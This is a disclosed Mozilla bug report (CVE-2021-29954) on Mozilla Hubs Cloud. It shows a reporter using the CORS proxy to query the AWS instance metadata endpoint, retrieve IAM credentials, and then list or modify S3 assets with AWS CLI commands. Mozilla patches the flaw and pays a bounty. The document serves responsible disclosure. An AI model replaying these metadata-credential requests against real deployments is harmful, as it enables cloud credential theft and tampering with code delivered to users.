Closed Bug 1707898 (CVE-2021-29954) Opened 3 years ago Closed 3 years ago

Mozilla Hubs Cloud: cloud api credentials exposure

Categories

(Cloud Services :: Security, defect)

Product:
Cloud Services
Component:
Security
Type:
defect

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: torsten.trumm, Unassigned)

Details

(Keywords: sec-critical, wsec-disclosure, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Mozilla Hubs exposes internal cloud endpoints which can be used to get credentials for cloud APIs.

Tested with current version at 2021-04-27.

Steps to reproduce on AWS:

  1. Find out the CORS proxy URL.
    Open the start page of a Hubs Cloud installation on AWS.
    Find out the assets URL by looking under the Network tab in the browser dev tools.
    for example https://HUBS_NAME-assets.HUBS_INTERNAL_DOMAIN/files/...
    With this information you can construct the CORS proxy URL.
    for example https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/

  2. Retrieve the cloud api credentials
    Background: AWS offers a special local endpoint for retrieving instance information.
    ( see https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html )
    Open https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/http://169.254.169.254/latest/meta-data/iam/security-credentials/
    append a slash and the returned value to the URL and call again.
    https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/http://169.254.169.254/latest/meta-data/iam/security-credentials/XXXXXXXX-app
    This will return AccessKeyId, SecretAccessKey and Token.
    With these anyone can connect to the AWS API and do everything that the server is allowed to do.

  3. Perform actions using the servers credentials

For example using the AWS CLI.

Enter the retrieved credentials into .aws/credentials on a machine with AWS CLI installed.

Verify that you have access.
aws --profile testapi --region eu-west-1 sts get-caller-identity
{
"Account": "XXXXXXXXXX",
"UserId": "AROAXJVIRVTGPR3HV3X7B:i-XXXXXXXXX",
"Arn": "arn:aws:sts::XXXXXXXXXX:assumed-role/XXXXXXXX-app/i-XXXXXXXXX"
}

Use the instance ID which the endpoint returned and retrieve the tags.
aws --profile testapi ec2 describe-tags --filters "Name=resource-id,Values=i-XXXXXXXXX" --region eu-west-1

The S3 bucket name can be constructed using the information from the aws:cloudformation:stack-id tag

Now you can list all assets, retrieve/delete/modify any asset.
aws --profile testapi s3 ls XXXXX-assets-XXXXXX/assets/images/ --region eu-west-1
2021-03-30 11:55:41 11628 hubs-cloud-logo.png

You could also modify the JavaScript files under /hubs/assets/js/ and replace them with versions containing malicious code that will then be delivered to the Hubs users.

Flags: sec-bounty?
Type: task → defect

torsten: thanks for your report, we'll investigate and report back on what we identify.

Group: cloud-services-security
Group: firefox-core-security
Product: Firefox → Cloud Services
QA Contact: nobody

Torsten: we have confirmed the issue and we're working on a fix now, thanks again for the report.

You are welcome. If you need more information just let me know.

Torsten: This issue was patched last night. We are working with our engineering and product teams to work on a notification to potentially affected customers and the actions we have taken and the actions they should take. I will close this bug because the vulnerability is addressed, we'll chase the rest of the clean up effort via our incident response process.

Thanks again for the report!

Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED

We are looking into sending an advisory to customers on this, ok if we use "Torsten Trumm" in the reporter section? It would show up here in this feed => https://www.mozilla.org/en-US/security/advisories/

Flags: needinfo?(torsten.trumm)

Sure. You can show me as reporter.

Flags: needinfo?(torsten.trumm)

Torsten: This is also a heads-up that this issue will be made public once the advisory has been made public.

Security Advisory: https://www.mozilla.org/en-US/security/advisories/mfsa2021-21/

I'm also lifting the sec flags on this bug so readers of the advisory can see the detailed report.

Group: cloud-services-security
Flags: sec-bounty? → sec-bounty+

Thank you so much, Torsten. We have awarded a Security Bug Bounty for this bug.

Thank you very much. I can confirm that the servers have updated themselves and the issue is resolved.

Alias: CVE-2021-29954
You need to log in before you can comment on or make changes to this bug.